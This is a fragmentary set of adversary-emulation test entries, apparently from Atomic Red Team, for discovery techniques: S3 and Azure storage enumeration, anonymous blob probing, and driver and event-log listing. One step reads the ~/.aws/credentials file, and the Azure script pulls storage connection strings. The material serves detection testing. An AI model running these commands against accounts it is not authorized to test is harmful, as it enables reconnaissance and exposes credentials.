Description: The Get-GPO cmdlet gets one Group Policy Object (GPO) or all the GPOs in a domain. Tested on Windows Server 2019 as a domain user with computer joined to domain. Reference: https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps
Prereq: Add Rsat.GroupPolicy.Management.Tools ###Two RSAT Modules needed for this to work on Win10, WinServer 2019 works by default. This will take a long time (almost 2 minutes) to install RSAT Manually###.
del $env:temp\GPO_Output.txt -erroraction silentlycontinue
T1619 - Cloud Storage Object Discovery
AWS S3 Enumeration
for bucket in "$(aws s3 ls | cut -d " " -f3)"; do aws s3api list-objects-v2 --bucket $bucket --output text; done
Description: This test will enumerate all the S3 buckets in the user account and lists all the files in each bucket.
Prereq: Check if ~/.aws/credentials file has a default stanza is configured
cat ~/.aws/credentials | grep "default"
T1619 - Cloud Storage Object Discovery
Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI
az login # Login to Azure
# Get all storage accounts in the subscription $storageAccounts = az storage account list --query "[].{name:name, resourceGroup:resourceGroup}" --output json | ConvertFrom-Json
$allowSharedKeyAccess = az storage account show --name $account.name --resource-group $account.resourceGroup --query "allowSharedKeyAccess"
if ($allowSharedKeyAccess -eq "false") { # $allowSharedKeyAccess could be true or null Write-Output "Shared key access is disabled for this storage account." } else { $connectionString = az storage account show-connection-string --name $account.name --resource-group $account.resourceGroup --query connectionString --output tsv
# Store file lists to csv file $storageAccountObjects | Export-Csv -Path "$env:temp\T1619_storage_account_objects.csv" -NoTypeInformation Write-Output "`nDownloaded storage account objects to $env:temp\T1619_storage_account_objects.csv"
# Print lists that have been stored as csv file $storageAccountObjects | Format-Table -Property ResourceGroup, StorageAccountName, FileShareName, ContainerName, BlobName, TableName, QueueName -AutoSize -Wrap
Description: This test enumerates all existing storage accounts and tries to fetch for each account the contained storage account objects. The access to storage objects is only possible if Shared Key authorization is enabled (e.g this is the case per default for storage objects creaded by Azure Function Apps).
Requirements:
- The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required.
- The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions.
Output format: Csv file that contains the found storage account objects
- Columns: ResourceGroup, StorageAccountName, FileShareName, ContainerName, BlobName, TableName, QueueName
- The content of these columns is filled out depending on the object. Not-required columns are left empt. Example: For a blob object the ResourceGroup, StorageAccountName, ContainerName, BlobName are filled out, the other fields are left empty.
Azure - Scan for Anonymous Access to Azure Storage (Powershell)
try{$response = invoke-webrequest "https://T1619Test2.blob.core.windows.net/None/None" -method "GET"} catch [system.net.webexception] {if($_.Exception.Response -ne $null) {$Response = $_.Exception.Response.GetResponseStream() $ReadResponse = New-Object System.IO.StreamReader($Response) $ReadResponse.BaseStream.Position = 0 $responseBody = $ReadResponse.ReadToEnd()} else {$responseBody = "The storage account could not be anonymously accessed."}} "Response received for T1619Test2.blob.core.windows.net/None/None: $responsebody" | out-file -filepath $env:temp\T1619Test2.txt -append
Description: Upon successful execution, this test will test for anonymous access to Azure storage containers by invoking a web request and outputting the results to a file.
The corresponding response could then be interpreted to determine whether or not the resource/container exists, as well as other information.
See https://ninocrudele.com/the-three-most-effective-and-dangerous-cyberattacks-to-azure-and-countermeasures-part-2-attack-the-azure-storage-service
Description: Upon successful execution, this test will utilize a wordlist to enumerate the public facing containers and blobs of a specified Azure storage account.
See https://www.netspi.com/blog/technical/cloud-penetration-testing/anonymously-enumerating-azure-file-resources/ .
Prereq: The Invoke-EnumerateAzureBlobs module must exist in PathToAtomicsFolder\..\ExternalPayloads.
if (test-path "..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"){exit 0} else {exit 1}
Prereq: The wordlist file for search permutations must exist in PathToAtomicsFolder\..\ExternalPayloads.
if (test-path "..\ExternalPayloads\permutations.txt"){exit 0} else {exit 1}
Description: Displays a list of installed device drivers on the local computer and their properties. Threat actors use this command to enumerate the existing drivers on the computer.
Parameters:
/v /fo list - Displays verbose output in a list format - the /v parameter is not valid for signed drivers
/si /fo list - Provides information about signed drivers and outputs it in a list format
Description: Uses the built-in PowerShell commandlet Get-EventLog to search for 'SYSTEM' keyword and saves results to a text file.
This technique was observed in a [TheDFIRReport case](https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/)
where the threat actor enumerated the Windows Security audit log to determine user accounts and associated IPv4 addresses.
Successful execution will save matching log events to the users temp folder.
Description: WevtUtil is a command line tool that can be utilised by adversaries to gather intelligence on a targeted Windows system's logging infrastructure.
By executing this command, malicious actors can enumerate all available event logs, including both default logs such as Application, Security, and System
as well as any custom logs created by administrators.
This information provides valuable insight into the system's logging mechanisms, potentially allowing attackers to identify gaps or weaknesses in the logging configuration
